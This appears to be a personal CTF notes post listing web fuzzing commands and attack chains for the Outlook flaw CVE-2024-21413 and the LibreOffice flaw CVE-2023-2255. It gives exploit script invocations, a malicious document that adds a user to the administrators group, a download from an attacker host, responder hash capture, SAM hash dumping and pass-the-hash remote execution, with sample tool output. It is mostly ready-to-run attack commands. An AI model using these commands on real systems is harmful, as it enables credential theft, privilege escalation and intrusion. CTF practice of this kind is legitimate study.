CTF Notes: 2024-05-05 CVE-2024-21413 CVE-2023-2255
Common web fuzzing cmd
- general path search
> dirsearch -u http://target -x 403,404
- find available parameters
> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://target/file.php?FUZZ=test"
- testing for possible LFI, a handy lightweight wordlist to use: https://github.com/Karanxa/Bug-Bounty-Wordlists
> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://target/file.php?file=../../../FUZZ"
CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability PoC
This script requires SMTP authentication to send an email, bypassing SPF, DKIM, and DMARC checks, which helps in simulating a real-world attack scenario more effectively.
> python3 CVE-2024-21413.py --server target --port 587 --username user@target --password passwd --sender user@domain --recipient victim@target --url '\\kali' --subject XD
> responder -I <eth>
CVE-2023-2255
Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used “floating frames” linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.
# on kali
python3 CVE-2023-2255.py --cmd 'net localgroup Administrator user /add' --output 'test.odt'
# target
wget http://kali/test.odt -O "c:\path\test.odt"
- once the user is added to admin group, dump the hash and access as admin
> crackmapexec smb target -u user -p pass --sam
[*] Initializing FTP protocol database
SMB target 445 target [*] Windows 10.0 Build 19041 x64 (name:target) (domain:target) (signing:False) (SMBv1:False)
SMB target 445 target [+] target\user:pass (Pwn3d!)
SMB target 445 target [+] Dumping SAM hashes
SMB target 445 target admin1:500:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB target 445 target admin2:501:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB target 445 target [+] Added 6 SAM hashes to the database
> impacket-wmiexec admin1@target -hashes "aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf"
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack